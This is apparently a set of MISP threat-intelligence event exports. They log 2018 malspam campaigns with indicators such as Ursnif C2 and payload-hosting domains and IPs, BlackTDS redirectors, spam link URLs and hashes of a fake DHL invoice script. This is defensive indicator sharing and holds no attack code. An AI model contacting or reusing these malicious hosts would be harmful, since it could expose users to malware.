 450 |                 "Event": {
 451 |                     "id": "2830",
 452 |                     "date": "2018-06-13",
 453 |                     "threat_level_id": "1",
 454 |                     "info": "malspam_2018-06-13_2",
 455 |                     "published": true,
 456 |                     "uuid": "5b21196c-b1c0-47e8-a536-1d19c0a8a8de",
 457 |                     "analysis": "2",
 458 |                     "timestamp": "1528896647",
 459 |                     "distribution": "2",
 460 |                     "org_id": "1",
 461 |                     "orgc_id": "1",
 462 |                     "Org": {
 463 |                         "id": "1",
 464 |                         "name": "DNC",
 465 |                         "uuid": "5749cdb1-1e74-450f-8baf-3ba5c0a8a8de"
 466 |                     },
 467 |                     "Orgc": {
 468 |                         "id": "1",
 469 |                         "name": "DNC",
 470 |                         "uuid": "5749cdb1-1e74-450f-8baf-3ba5c0a8a8de"
 471 |                     }
 472 |                 }
 473 |             },
 474 |             {
 475 |                 "Event": {
 476 |                     "id": "2831",
 477 |                     "date": "2018-06-13",
 478 |                     "threat_level_id": "1",
 479 |                     "info": "malspam_2018-06-13_3",
 480 |                     "published": true,
 481 |                     "uuid": "5b2123e6-1dc0-48ef-8da2-1d19c0a8a8de",
 482 |                     "analysis": "2",
 483 |                     "timestamp": "1528985012",
 484 |                     "distribution": "2",
 485 |                     "org_id": "1",
 486 |                     "orgc_id": "1",
 487 |                     "Org": {
 488 |                         "id": "1",
 489 |                         "name": "DNC",
 490 |                         "uuid": "5749cdb1-1e74-450f-8baf-3ba5c0a8a8de"
 491 |                     },
 492 |                     "Orgc": {
 493 |                         "id": "1",
 494 |                         "name": "DNC",
 495 |                         "uuid": "5749cdb1-1e74-450f-8baf-3ba5c0a8a8de"
 496 |                     }
 497 |                 }
 498 |             },
 499 |             {
 500 |                 "Event": {
 501 |                     "id": "2826",
 502 |                     "date": "2018-06-12",
 503 |                     "threat_level_id": "1",
 504 |                     "info": "malspam_2018-06-12_1",
 505 |                     "published": true,
 506 |                     "uuid": "5b1fc14b-9740-4e06-a555-2807c0a8a8de",
 507 |                     "analysis": "2",
 508 |                     "timestamp": "1528809606",
 509 |                     "distribution": "2",
 510 |                     "org_id": "1",
 511 |                     "orgc_id": "1",
 512 |                     "Org": {
 513 |                         "id": "1",
 514 |                         "name": "DNC",
 515 |                         "uuid": "5749cdb1-1e74-450f-8baf-3ba5c0a8a8de"
 516 |                     },
 517 |                     "Orgc": {
 518 |                         "id": "1",
 519 |                         "name": "DNC",
 520 |                         "uuid": "5749cdb1-1e74-450f-8baf-3ba5c0a8a8de"
 521 |                     }
 522 |                 }
 523 |             },
 524 |             {
 525 |                 "Event": {
 526 |                     "id": "2824",
 527 |                     "date": "2018-06-11",
 528 |                     "threat_level_id": "1",
 529 |                     "info": "Malspam_2018-06-11_1",
 530 |                     "published": true,
 531 |                     "uuid": "5b1e5365-a768-4571-a880-144ec0a8a8de",
 532 |                     "analysis": "2",
 533 |                     "timestamp": "1528729067",
 534 |                     "distribution": "2",
 535 |                     "org_id": "1",
 536 |                     "orgc_id": "1",
 537 |                     "Org": {
 538 |                         "id": "1",
 539 |                         "name": "DNC",
 540 |                         "uuid": "5749cdb1-1e74-450f-8baf-3ba5c0a8a8de"
 541 |                     },
 542 |                     "Orgc": {
 543 |                         "id": "1",
 544 |                         "name": "DNC",
 545 |                         "uuid": "5749cdb1-1e74-450f-8baf-3ba5c0a8a8de"
 546 |                     }
 547 |                 }
 548 |             },
 549 |             {
 550 |                 "Event": {
 551 |                     "id": "2832",
 552 |                     "date": "2018-06-07",
 553 |                     "threat_level_id": "1",
 554 |                     "info": "Soceng_2018-06-07_1",
 555 |                     "published": true,
 556 |                     "uuid": "5b213722-9918-4f9a-946d-179fc0a8a8de",
 557 |                     "analysis": "2",
 558 |                     "timestamp": "1528904104",
 559 |                     "distribution": "2",
 560 |                     "org_id": "1",
 561 |                     "orgc_id": "1",
 562 |                     "Org": {
 563 |                         "id": "1",
 564 |                         "name": "DNC",
 565 |                         "uuid": "5749cdb1-1e74-450f-8baf-3ba5c0a8a8de"
 566 |                     },
 567 |                     "Orgc": {
 568 |                         "id": "1",
 569 |                         "name": "DNC",
 570 |                         "uuid": "5749cdb1-1e74-450f-8baf-3ba5c0a8a8de"
 571 |                     }
 572 |                 }
 573 |             },
 574 |             {
 575 |                 "Event": {
 576 |                     "id": "2821",
 577 |                     "date": "2018-06-06",
 578 |                     "threat_level_id": "1",
 579 |                     "info": "malspam_2018-06-06_1",
 580 |                     "published": true,
 581 |                     "uuid": "5b179a7f-2fa4-4464-8c85-4d87c0a8a8de",
 582 |                     "analysis": "2",
 583 |                     "timestamp": "1528279095",
 584 |                     "distribution": "2",
 585 |                     "org_id": "1",
 586 |                     "orgc_id": "1",
 587 |                     "Org": {
 588 |                         "id": "1",
 589 |                         "name": "DNC",
 590 |                         "uuid": "5749cdb1-1e74-450f-8baf-3ba5c0a8a8de"
 591 |                     },
 592 |                     "Orgc": {
 593 |                         "id": "1",
 594 |                         "name": "DNC",
 595 |                         "uuid": "5749cdb1-1e74-450f-8baf-3ba5c0a8a8de"
 596 |                     }
 597 |                 }
 598 |             },
 599 |             {
 600 |                 "Event": {
 601 |                     "id": "2820",
 602 |                     "date": "2018-06-05",
 603 |                     "threat_level_id": "1",
 604 |                     "info": "malspam_2018-06-05_2",
 605 |                     "published": true,
 606 |                     "uuid": "5b16654b-0830-4488-ba01-1dc4c0a8a8de",
 607 |                     "analysis": "2",
 608 |                     "timestamp": "1528194793",
 609 |                     "distribution": "2",
 610 |                     "org_id": "1",
 611 |                     "orgc_id": "1",
 612 |                     "Org": {
 613 |                         "id": "1",
 614 |                         "name": "DNC",
 615 |                         "uuid": "5749cdb1-1e74-450f-8baf-3ba5c0a8a8de"
 616 |                     },
 617 |                     "Orgc": {
 618 |                         "id": "1",
 619 |                         "name": "DNC",
 620 |                         "uuid": "5749cdb1-1e74-450f-8baf-3ba5c0a8a8de"
 621 |                     }
 622 |                 }
 623 |             },
 624 |             {
 625 |                 "Event": {
 626 |                     "id": "2816",
 627 |                     "date": "2018-05-31",
 628 |                     "threat_level_id": "1",
 629 |                     "info": "malspam_2018-05-31_4",
 630 |                     "published": true,
 631 |                     "uuid": "5b102bbd-e4d4-49bc-ab50-472ec0a8a8de",
 632 |                     "analysis": "2",
 633 |                     "timestamp": "1527787039",
 634 |                     "distribution": "2",
 635 |                     "org_id": "1",
 636 |                     "orgc_id": "1",
 637 |                     "Org": {
 638 |                         "id": "1",
 639 |                         "name": "DNC",
 640 |                         "uuid": "5749cdb1-1e74-450f-8baf-3ba5c0a8a8de"
 641 |                     },
 642 |                     "Orgc": {
 643 |                         "id": "1",
 644 |                         "name": "DNC",
 645 |                         "uuid": "5749cdb1-1e74-450f-8baf-3ba5c0a8a8de"
 646 |                     }
 647 |                 }
 648 |             }
 649 |         ],
 650 |         "Galaxy": [],
 651 |         "Object": [
 652 |             {
 653 |                 "id": "578",
 654 |                 "name": "domain|ip",
 655 |                 "meta-category": "network",
 656 |                 "description": "A domain and IP address seen as a tuple in a specific time frame.",
 657 |                 "template_uuid": "43b3b146-77eb-4931-b4cc-b66c60f28734",
 658 |                 "template_version": "2",
 659 |                 "event_id": "2834",
 660 |                 "uuid": "5b22c291-e6f8-4de6-8def-500ac0a8a8de",
 661 |                 "timestamp": "1529004689",
 662 |                 "distribution": "5",
 663 |                 "sharing_group_id": "0",
 664 |                 "comment": "Intermediate Redirector",
 665 |                 "deleted": false,
 666 |                 "ObjectReference": [],
 667 |                 "Attribute": [
 668 |                     {
 669 |                         "id": "69269",
 670 |                         "type": "text",
 671 |                         "category": "Other",
 672 |                         "to_ids": false,
 673 |                         "uuid": "5b22c291-5904-48f7-8ce6-500ac0a8a8de",
 674 |                         "event_id": "2834",
 675 |                         "distribution": "5",
 676 |                         "timestamp": "1529004689",
 677 |                         "comment": "",
 678 |                         "sharing_group_id": "0",
 679 |                         "deleted": false,
 680 |                         "disable_correlation": true,
 681 |                         "object_id": "578",
 682 |                         "object_relation": "text",
 683 |                         "value": "Intermediate Redirector",
 684 |                         "ShadowAttribute": []
 685 |                     },
 686 |                     {
 687 |                         "id": "69270",
 688 |                         "type": "domain",
 689 |                         "category": "Network activity",
 690 |                         "to_ids": true,
 691 |                         "uuid": "5b22c291-5520-47ac-abad-500ac0a8a8de",
 692 |                         "event_id": "2834",
 693 |                         "distribution": "5",
 694 |                         "timestamp": "1529004689",
 695 |                         "comment": "",
 696 |                         "sharing_group_id": "0",
 697 |                         "deleted": false,
 698 |                         "disable_correlation": false,
 699 |                         "object_id": "578",
 700 |                         "object_relation": "domain",
 701 |                         "value": "kingerosses.top",
 702 |                         "ShadowAttribute": []
 703 |                     },
 704 |                     {
 705 |                         "id": "69271",
 706 |                         "type": "ip-dst",
 707 |                         "category": "Network activity",
 708 |                         "to_ids": true,
 709 |                         "uuid": "5b22c291-8b98-45b5-afd9-500ac0a8a8de",
 710 |                         "event_id": "2834",
 711 |                         "distribution": "5",
 712 |                         "timestamp": "1529004689",
 713 |                         "comment": "",
 714 |                         "sharing_group_id": "0",
 715 |                         "deleted": false,
 716 |                         "disable_correlation": false,
 717 |                         "object_id": "578",
 718 |                         "object_relation": "ip",
 719 |                         "value": "46.21.147.252",
 720 |                         "ShadowAttribute": []
 721 |                     }
 722 |                 ]
 723 |             },
 724 |             {
 725 |                 "id": "579",
 726 |                 "name": "domain|ip",
 727 |                 "meta-category": "network",
 728 |                 "description": "A domain and IP address seen as a tuple in a specific time frame.",
 729 |                 "template_uuid": "43b3b146-77eb-4931-b4cc-b66c60f28734",
 730 |                 "template_version": "2",
 731 |                 "event_id": "2834",
 732 |                 "uuid": "5b22c2b9-a754-4022-9e52-1742c0a8a8de",
 733 |                 "timestamp": "1529004729",
 734 |                 "distribution": "5",
 735 |                 "sharing_group_id": "0",
 736 |                 "comment": "BlackTDS - GBR filtered",
 737 |                 "deleted": false,
 738 |                 "ObjectReference": [],
 739 |                 "Attribute": [
 740 |                     {
 741 |                         "id": "69272",
 742 |                         "type": "text",
 743 |                         "category": "Other",
 744 |                         "to_ids": false,
 745 |                         "uuid": "5b22c2b9-905c-4a1d-9843-1742c0a8a8de",
 746 |                         "event_id": "2834",
 747 |                         "distribution": "5",
 748 |                         "timestamp": "1529004729",
 749 |                         "comment": "",
 750 |                         "sharing_group_id": "0",
 751 |                         "deleted": false,
 752 |                         "disable_correlation": true,
 753 |                         "object_id": "579",
 754 |                         "object_relation": "text",
 755 |                         "value": "BlackTDS - GBR filtered",
 756 |                         "ShadowAttribute": []
 757 |                     },
 758 |                     {
 759 |                         "id": "69273",
 760 |                         "type": "domain",
 761 |                         "category": "Network activity",
 762 |                         "to_ids": true,
 763 |                         "uuid": "5b22c2b9-5ac0-448c-b715-1742c0a8a8de",
 764 |                         "event_id": "2834",
 765 |                         "distribution": "5",
 766 |                         "timestamp": "1529004729",
 767 |                         "comment": "",
 768 |                         "sharing_group_id": "0",
 769 |                         "deleted": false,
 770 |                         "disable_correlation": false,
 771 |                         "object_id": "579",
 772 |                         "object_relation": "domain",
 773 |                         "value": "darksoulshere.gq",
 774 |                         "ShadowAttribute": []
 775 |                     },
 776 |                     {
 777 |                         "id": "69274",
 778 |                         "type": "ip-dst",
 779 |                         "category": "Network activity",
 780 |                         "to_ids": true,
 781 |                         "uuid": "5b22c2b9-ec78-42dc-97e3-1742c0a8a8de",
 782 |                         "event_id": "2834",
 783 |                         "distribution": "5",
 784 |                         "timestamp": "1529004729",
 785 |                         "comment": "",
 786 |                         "sharing_group_id": "0",
 787 |                         "deleted": false,
 788 |                         "disable_correlation": false,
 789 |                         "object_id": "579",
 790 |                         "object_relation": "ip",
 791 |                         "value": "200.74.240.219",
 792 |                         "ShadowAttribute": []
 793 |                     }
 794 |                 ]
 795 |             },
 796 |             {
 797 |                 "id": "580",
 798 |                 "name": "domain|ip",
 799 |                 "meta-category": "network",
 800 |                 "description": "A domain and IP address seen as a tuple in a specific time frame.",
 801 |                 "template_uuid": "43b3b146-77eb-4931-b4cc-b66c60f28734",
 802 |                 "template_version": "2",
 803 |                 "event_id": "2834",
 804 |                 "uuid": "5b22c2e2-5a8c-4ba5-99f9-1742c0a8a8de",
 805 |                 "timestamp": "1529004770",
 806 |                 "distribution": "5",
 807 |                 "sharing_group_id": "0",
 808 |                 "comment": "Server hosting the JS and its callback payload (Ursnif)",
 809 |                 "deleted": false,
 810 |                 "ObjectReference": [],
 811 |                 "Attribute": [
 812 |                     {
 813 |                         "id": "69275",
 814 |                         "type": "text",
 815 |                         "category": "Other",
 816 |                         "to_ids": false,
 817 |                         "uuid": "5b22c2e2-567c-4002-a6e6-1742c0a8a8de",
 818 |                         "event_id": "2834",
 819 |                         "distribution": "5",
 820 |                         "timestamp": "1529004770",
 821 |                         "comment": "",
 822 |                         "sharing_group_id": "0",
 823 |                         "deleted": false,
 824 |                         "disable_correlation": true,
 825 |                         "object_id": "580",
 826 |                         "object_relation": "text",
 827 |                         "value": "Server hosting the JS and its callback payload (Ursnif)",
 828 |                         "ShadowAttribute": []
 829 |                     },
 830 |                     {
 831 |                         "id": "69276",
 832 |                         "type": "domain",
 833 |                         "category": "Network activity",
 834 |                         "to_ids": true,
 835 |                         "uuid": "5b22c2e2-8e80-46e8-a3cf-1742c0a8a8de",
 836 |                         "event_id": "2834",
 837 |                         "distribution": "5",
 838 |                         "timestamp": "1529004770",
 839 |                         "comment": "",
 840 |                         "sharing_group_id": "0",
 841 |                         "deleted": false,
 842 |                         "disable_correlation": false,
 843 |                         "object_id": "580",
 844 |                         "object_relation": "domain",
 845 |                         "value": "vunteriseffe.top",
 846 |                         "ShadowAttribute": []
 847 |                     },
 848 |                     {
 849 |                         "id": "69277",
 850 |                         "type": "ip-dst",
 851 |                         "category": "Network activity",
 852 |                         "to_ids": true,
 853 |                         "uuid": "5b22c2e2-5470-46c0-8c1e-1742c0a8a8de",
 854 |                         "event_id": "2834",
 855 |                         "distribution": "5",
 856 |                         "timestamp": "1529004770",
 857 |                         "comment": "",
 858 |                         "sharing_group_id": "0",
 859 |                         "deleted": false,
 860 |                         "disable_correlation": false,
 861 |                         "object_id": "580",
 862 |                         "object_relation": "ip",
 863 |                         "value": "46.21.147.252",
 864 |                         "ShadowAttribute": []
 865 |                     }
 866 |                 ]
 867 |             },
 868 |             {
 869 |                 "id": "581",
 870 |                 "name": "domain|ip",
 871 |                 "meta-category": "network",
 872 |                 "description": "A domain and IP address seen as a tuple in a specific time frame.",
 873 |                 "template_uuid": "43b3b146-77eb-4931-b4cc-b66c60f28734",
 874 |                 "template_version": "2",
 875 |                 "event_id": "2834",
 876 |                 "uuid": "5b22c2fb-d79c-4454-b2d8-17e3c0a8a8de",
 877 |                 "timestamp": "1529004795",
 878 |                 "distribution": "5",
 879 |                 "sharing_group_id": "0",
 880 |                 "comment": "Ursnif C2",
 881 |                 "deleted": false,
 882 |                 "ObjectReference": [],
 883 |                 "Attribute": [
 884 |                     {
 885 |                         "id": "69278",
 886 |                         "type": "text",
 887 |                         "category": "Other",
 888 |                         "to_ids": false,
 889 |                         "uuid": "5b22c2fb-8ea4-43ac-b80c-17e3c0a8a8de",
 890 |                         "event_id": "2834",
 891 |                         "distribution": "5",
 892 |                         "timestamp": "1529004795",
 893 |                         "comment": "",
 894 |                         "sharing_group_id": "0",
 895 |                         "deleted": false,
 896 |                         "disable_correlation": true,
 897 |                         "object_id": "581",
 898 |                         "object_relation": "text",
 899 |                         "value": "Ursnif C2",
 900 |                         "ShadowAttribute": []
 901 |                     },
 902 |                     {
 903 |                         "id": "69279",
 904 |                         "type": "domain",
 905 |                         "category": "Network activity",
 906 |                         "to_ids": true,
 907 |                         "uuid": "5b22c2fb-41e4-445d-9c85-17e3c0a8a8de",
 908 |                         "event_id": "2834",
 909 |                         "distribution": "5",
 910 |                         "timestamp": "1529004795",
 911 |                         "comment": "",
 912 |                         "sharing_group_id": "0",
 913 |                         "deleted": false,
 914 |                         "disable_correlation": false,
 915 |                         "object_id": "581",
 916 |                         "object_relation": "domain",
 917 |                         "value": "damagederivedcomlimited.club",
 918 |                         "ShadowAttribute": []
 919 |                     },
 920 |                     {
 921 |                         "id": "69280",
 922 |                         "type": "ip-dst",
 923 |                         "category": "Network activity",
 924 |                         "to_ids": true,
 925 |                         "uuid": "5b22c2fb-f2c0-41a6-b992-17e3c0a8a8de",
 926 |                         "event_id": "2834",
 927 |                         "distribution": "5",
 928 |                         "timestamp": "1529004795",
 929 |                         "comment": "",
 930 |                         "sharing_group_id": "0",
 931 |                         "deleted": false,
 932 |                         "disable_correlation": false,
 933 |                         "object_id": "581",
 934 |                         "object_relation": "ip",
 935 |                         "value": "49.51.82.173",
 936 |                         "ShadowAttribute": []
 937 |                     }
 938 |                 ]
 939 |             },
 940 |             {
 941 |                 "id": "582",
 942 |                 "name": "file",
 943 |                 "meta-category": "file",
 944 |                 "description": "File object describing a file with meta-information",
 945 |                 "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
 946 |                 "template_version": "3",
 947 |                 "event_id": "2834",
 948 |                 "uuid": "5b22c3cd-d1bc-4fff-8816-45f7c0a8a8de",
 949 |                 "timestamp": "1529005005",
 950 |                 "distribution": "5",
 951 |                 "sharing_group_id": "0",
 952 |                 "comment": "DHL-Express-Customer-Invoice.js",
 953 |                 "deleted": false,
 954 |                 "ObjectReference": [],
 955 |                 "Attribute": [
 956 |                     {
 957 |                         "id": "69286",
 958 |                         "type": "md5",
 959 |                         "category": "Payload delivery",
 960 |                         "to_ids": true,
 961 |                         "uuid": "5b22c3cd-a228-4f4d-95d3-45f7c0a8a8de",
 962 |                         "event_id": "2834",
 963 |                         "distribution": "5",
 964 |                         "timestamp": "1529005005",
 965 |                         "comment": "",
 966 |                         "sharing_group_id": "0",
 967 |                         "deleted": false,
 968 |                         "disable_correlation": false,
 969 |                         "object_id": "582",
 970 |                         "object_relation": "md5",
 971 |                         "value": "e9f1439d6c4010f63ad7059d280f138f",
 972 |                         "ShadowAttribute": []
 973 |                     },
 974 |                     {
 975 |                         "id": "69287",
 976 |                         "type": "sha256",
 977 |                         "category": "Payload delivery",
 978 |                         "to_ids": true,
 979 |                         "uuid": "5b22c3cd-6290-4c87-b5b3-45f7c0a8a8de",
 980 |                         "event_id": "2834",
 981 |                         "distribution": "5",
 982 |                         "timestamp": "1529005005",
 983 |                         "comment": "",
 984 |                         "sharing_group_id": "0",
 985 |                         "deleted": false,
 986 |                         "disable_correlation": false,
 987 |                         "object_id": "582",
 988 |                         "object_relation": "sha256",
 989 |                         "value": "52ae5969e5cf826bfa5fffd833cd03786e621c1065d66d21e283a5a42b73b2d8",
 990 |                         "ShadowAttribute": []
 991 |                     },
 992 |                     {
 993 |                         "id": "69288",
 994 |                         "type": "filename",
 995 |                         "category": "Payload delivery",
 996 |                         "to_ids": true,
 997 |                         "uuid": "5b22c3cd-dcc4-4f6f-8cba-45f7c0a8a8de",
 998 |                         "event_id": "2834",
 999 |                         "distribution": "5",
1000 |                         "timestamp": "1529005005",
1001 |                         "comment": "",
1002 |                         "sharing_group_id": "0",
1003 |                         "deleted": false,
1004 |                         "disable_correlation": true,
1005 |                         "object_id": "582",
1006 |                         "object_relation": "filename",
1007 |                         "value": "DHL-Express-Customer-Invoice.js",
1008 |                         "ShadowAttribute": []
1009 |                     },
1010 |                     {
1011 |                         "id": "69289",
1012 |                         "type": "sha1",
1013 |                         "category": "Payload delivery",
1014 |                         "to_ids": true,
1015 |                         "uuid": "5b22c3cd-cc08-4c67-972d-45f7c0a8a8de",
1016 |                         "event_id": "2834",
1017 |                         "distribution": "5",
1018 |                         "timestamp": "1529005005",
1019 |                         "comment": "",
1020 |                         "sharing_group_id": "0",
1021 |                         "deleted": false,
1022 |                         "disable_correlation": false,
1023 |                         "object_id": "582",
1024 |                         "object_relation": "sha1",
1025 |                         "value": "397e666d2e692da2ea1c263da946a4f6c2d9fed6",
1026 |                         "ShadowAttribute": []
1027 |                     },
1028 |                     {
1029 |                         "id": "69290",
1030 |                         "type": "size-in-bytes",
1031 |                         "category": "Other",
1032 |                         "to_ids": false,
1033 |                         "uuid": "5b22c3cd-8d50-4faa-bc97-45f7c0a8a8de",
1034 |                         "event_id": "2834",
1035 |                         "distribution": "5",
1036 |                         "timestamp": "1529005005",
1037 |                         "comment": "",
1038 |                         "sharing_group_id": "0",
1039 |                         "deleted": false,
1040 |                         "disable_correlation": true,
1041 |                         "object_id": "582",
1042 |                         "object_relation": "size-in-bytes",
1043 |                         "value": "21194",
1044 |                         "ShadowAttribute": []
1045 |                     }
1046 |                 ]
1047 |             },
1048 |             {
1049 |                 "id": "583",
1050 |                 "name": "file",
1051 |                 "meta-category": "file",
1052 |                 "description": "File object describing a file with meta-information",
1053 |                 "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
1054 |                 "template_version": "3",
1055 |                 "event_id": "2834",
1056 |                 "uuid": "5b22c3fa-6b70-45fe-b1f4-1744c0a8a8de",
1057 |                 "timestamp": "1529005050",
1058 |                 "distribution": "5",
1059 |                 "sharing_group_id": "0",
1060 |                 "comment": "data.bin",
1061 |                 "deleted": false,
1062 |                 "ObjectReference": [],
1063 |                 "Attribute": [
1064 |                     {
1065 |                         "id": "69291",
1066 |                         "type": "md5",
1067 |                         "category": "Payload delivery",
1068 |                         "to_ids": true,
1069 |                         "uuid": "5b22c3fa-9804-4e30-a389-1744c0a8a8de",
1070 |                         "event_id": "2834",
1071 |                         "distribution": "5",
1072 |                         "timestamp": "1529005050",
1073 |                         "comment": "",
1074 |                         "sharing_group_id": "0",
1075 |                         "deleted": false,
1076 |                         "disable_correlation": false,
1077 |                         "object_id": "583",
1078 |                         "object_relation": "md5",
1079 |                         "value": "40f12e4afee70798d18f907692753ec2",
1080 |                         "ShadowAttribute": []
1081 |                     },
1082 |                     {
1083 |                         "id": "69292",
1084 |                         "type": "sha256",
1085 |                         "category": "Payload delivery",
1086 |                         "to_ids": true,
1087 |                         "uuid": "5b22c3fa-b37c-45e7-be11-1744c0a8a8de",
1088 |                         "event_id": "2834",
1089 |                         "distribution": "5",
1090 |                         "timestamp": "1529005050",
1091 |                         "comment": "",
1092 |                         "sharing_group_id": "0",
1093 |                         "deleted": false,
1094 |                         "disable_correlation": false,
1095 |                         "object_id": "583",
1096 |                         "object_relation": "sha256",
1097 |                         "value": "b965fd5dcfce6bf2036a40e3d1f4ddd634a75141227213b4c12befe274e4644b",
1098 |                         "ShadowAttribute": []
1099 |                     },
1100 |                     {
1101 |                         "id": "69293",
1102 |                         "type": "filename",
1103 |                         "category": "Payload delivery",
1104 |                         "to_ids": true,
1105 |                         "uuid": "5b22c3fa-f34c-48d5-8010-1744c0a8a8de",
1106 |                         "event_id": "2834",
1107 |                         "distribution": "5",
1108 |                         "timestamp": "1529005050",
1109 |                         "comment": "",
1110 |                         "sharing_group_id": "0",
1111 |                         "deleted": false,
1112 |                         "disable_correlation": true,
1113 |                         "object_id": "583",
1114 |                         "object_relation": "filename",
1115 |                         "value": "data.bin",
1116 |                         "ShadowAttribute": []
1117 |                     },
1118 |                     {
1119 |                         "id": "69294",
1120 |                         "type": "sha1",
1121 |                         "category": "Payload delivery",
1122 |                         "to_ids": true,
1123 |                         "uuid": "5b22c3fa-7c9c-4f66-9c72-1744c0a8a8de",
1124 |                         "event_id": "2834",
1125 |                         "distribution": "5",
1126 |                         "timestamp": "1529005050",
1127 |                         "comment": "",
1128 |                         "sharing_group_id": "0",
1129 |                         "deleted": false,
1130 |                         "disable_correlation": false,
1131 |                         "object_id": "583",
1132 |                         "object_relation": "sha1",
1133 |                         "value": "cac2ae956da446fbe2f05919201a8b61295d7eb2",
1134 |                         "ShadowAttribute": []
1135 |                     },
1136 |                     {
1137 |                         "id": "69295",
1138 |                         "type": "size-in-bytes",
1139 |                         "category": "Other",
1140 |                         "to_ids": false,
1141 |                         "uuid": "5b22c3fa-6248-45f0-bdd5-1744c0a8a8de",
1142 |                         "event_id": "2834",
1143 |                         "distribution": "5",
1144 |                         "timestamp": "1529005050",
1145 |                         "comment": "",
1146 |                         "sharing_group_id": "0",
1147 |                         "deleted": false,
1148 |                         "disable_correlation": true,
1149 |                         "object_id": "583",
1150 |                         "object_relation": "size-in-bytes",
1151 |                         "value": "328704",
1152 |                         "ShadowAttribute": []
1153 |                     }
1154 |                 ]
1155 |             }
1156 |         ],
1157 |         "Tag": [
1158 |             {
1159 |                 "id": "205",
1160 |                 "name": "dnc:driveby-type=\"Malspam\"",
1161 |                 "colour": "#000000",
1162 |                 "exportable": true,
1163 |                 "hide_tag": false
1164 |             },
1165 |             {
1166 |                 "id": "263",
1167 |                 "name": "dnc:malspam-type=\"url-to-js\"",
1168 |                 "colour": "#6699ff",
1169 |                 "exportable": true,
1170 |                 "hide_tag": false
1171 |             },
1172 |             {
1173 |                 "id": "1599",
1174 |                 "name": "dnc:tds=\"BlackTDS\"",
1175 |                 "colour": "#ffffff",
1176 |                 "exportable": true,
1177 |                 "hide_tag": false
1178 |             },
1179 |             {
1180 |                 "id": "1787",
1181 |                 "name": "dnc:attrib-int=\"180064\"",
1182 |                 "colour": "#87bedd",
1183 |                 "exportable": true,
1184 |                 "hide_tag": false
1185 |             },
1186 |             {
1187 |                 "id": "1788",
1188 |                 "name": "dnc:attrib=\"LaWW\"",
1189 |                 "colour": "#87bedd",
1190 |                 "exportable": true,
1191 |                 "hide_tag": false
1192 |             },
1193 |             {
1194 |                 "id": "68",
1195 |                 "name": "dnc:country=\"GBR\"",
1196 |                 "colour": "#321fa5",
1197 |                 "exportable": true,
1198 |                 "hide_tag": false
1199 |             },
1200 |             {
1201 |                 "id": "111",
1202 |                 "name": "dnc:malware=\"Dreambot\/ISFB\"",
1203 |                 "colour": "#4bc7cf",
1204 |                 "exportable": true,
1205 |                 "hide_tag": false
1206 |             },
1207 |             {
1208 |                 "id": "293",
1209 |                 "name": "dnc:dreambot-id=\"2002\"",
1210 |                 "colour": "#4bc7cf",
1211 |                 "exportable": true,
1212 |                 "hide_tag": false
1213 |             }
1214 |         ]
1215 |     }
1216 | }
1217 | ]}
1218 | 


--------------------------------------------------------------------------------
/IOCs/misp.event.2879.5b3544f7-1e20-4f39-8713-055ec0a8a8de.json:
--------------------------------------------------------------------------------
   1 | {"response":[{
   2 |     "Event": {
   3 |         "id": "2879",
   4 |         "orgc_id": "1",
   5 |         "org_id": "1",
   6 |         "date": "2018-06-28",
   7 |         "threat_level_id": "1",
   8 |         "info": "malspam_2018-06-28_2",
   9 |         "published": true,
  10 |         "uuid": "5b3544f7-1e20-4f39-8713-055ec0a8a8de",
  11 |         "attribute_count": "56",
  12 |         "analysis": "2",
  13 |         "timestamp": "1530227484",
  14 |         "distribution": "2",
  15 |         "proposal_email_lock": false,
  16 |         "locked": false,
  17 |         "publish_timestamp": "1530227489",
  18 |         "sharing_group_id": "0",
  19 |         "disable_correlation": false,
  20 |         "extends_uuid": "",
  21 |         "event_creator_email": "kafeine@dontneedcoffee.com",
  22 |         "Org": {
  23 |             "id": "1",
  24 |             "name": "DNC",
  25 |             "uuid": "5749cdb1-1e74-450f-8baf-3ba5c0a8a8de"
  26 |         },
  27 |         "Orgc": {
  28 |             "id": "1",
  29 |             "name": "DNC",
  30 |             "uuid": "5749cdb1-1e74-450f-8baf-3ba5c0a8a8de"
  31 |         },
  32 |         "Attribute": [
  33 |             {
  34 |                 "id": "71451",
  35 |                 "type": "url",
  36 |                 "category": "Network activity",
  37 |                 "to_ids": true,
  38 |                 "uuid": "5b355032-1184-446b-a36d-055cc0a8a8de",
  39 |                 "event_id": "2879",
  40 |                 "distribution": "5",
  41 |                 "timestamp": "1530220594",
  42 |                 "comment": "Link in Spam",
  43 |                 "sharing_group_id": "0",
  44 |                 "deleted": false,
  45 |                 "disable_correlation": false,
  46 |                 "object_id": "0",
  47 |                 "object_relation": null,
  48 |                 "value": "http:\/\/funparc.fr\/ns\/",
  49 |                 "ShadowAttribute": []
  50 |             },
  51 |             {
  52 |                 "id": "71452",
  53 |                 "type": "url",
  54 |                 "category": "Network activity",
  55 |                 "to_ids": true,
  56 |                 "uuid": "5b355032-ff00-418d-8c8b-055cc0a8a8de",
  57 |                 "event_id": "2879",
  58 |                 "distribution": "5",
  59 |                 "timestamp": "1530220594",
  60 |                 "comment": "Link in Spam",
  61 |                 "sharing_group_id": "0",
  62 |                 "deleted": false,
  63 |                 "disable_correlation": false,
  64 |                 "object_id": "0",
  65 |                 "object_relation": null,
  66 |                 "value": "https:\/\/dupratconcept.com\/id\/",
  67 |                 "ShadowAttribute": []
  68 |             },
  69 |             {
  70 |                 "id": "71453",
  71 |                 "type": "url",
  72 |                 "category": "Network activity",
  73 |                 "to_ids": true,
  74 |                 "uuid": "5b355032-2eac-4d8b-b680-055cc0a8a8de",
  75 |                 "event_id": "2879",
  76 |                 "distribution": "5",
  77 |                 "timestamp": "1530220594",
  78 |                 "comment": "Link in Spam",
  79 |                 "sharing_group_id": "0",
  80 |                 "deleted": false,
  81 |                 "disable_correlation": false,
  82 |                 "object_id": "0",
  83 |                 "object_relation": null,
  84 |                 "value": "https:\/\/greenparc-labaule.com\/scripts\/",
  85 |                 "ShadowAttribute": []
  86 |             },
  87 |             {
  88 |                 "id": "71454",
  89 |                 "type": "url",
  90 |                 "category": "Network activity",
  91 |                 "to_ids": true,
  92 |                 "uuid": "5b355032-c624-49af-b18b-055cc0a8a8de",
  93 |                 "event_id": "2879",
  94 |                 "distribution": "5",
  95 |                 "timestamp": "1530220594",
  96 |                 "comment": "Link in Spam",
  97 |                 "sharing_group_id": "0",
  98 |                 "deleted": false,
  99 |                 "disable_correlation": false,
 100 |                 "object_id": "0",
 101 |                 "object_relation": null,
 102 |                 "value": "https:\/\/dupratconcept.com\/signaturemail\/\/",
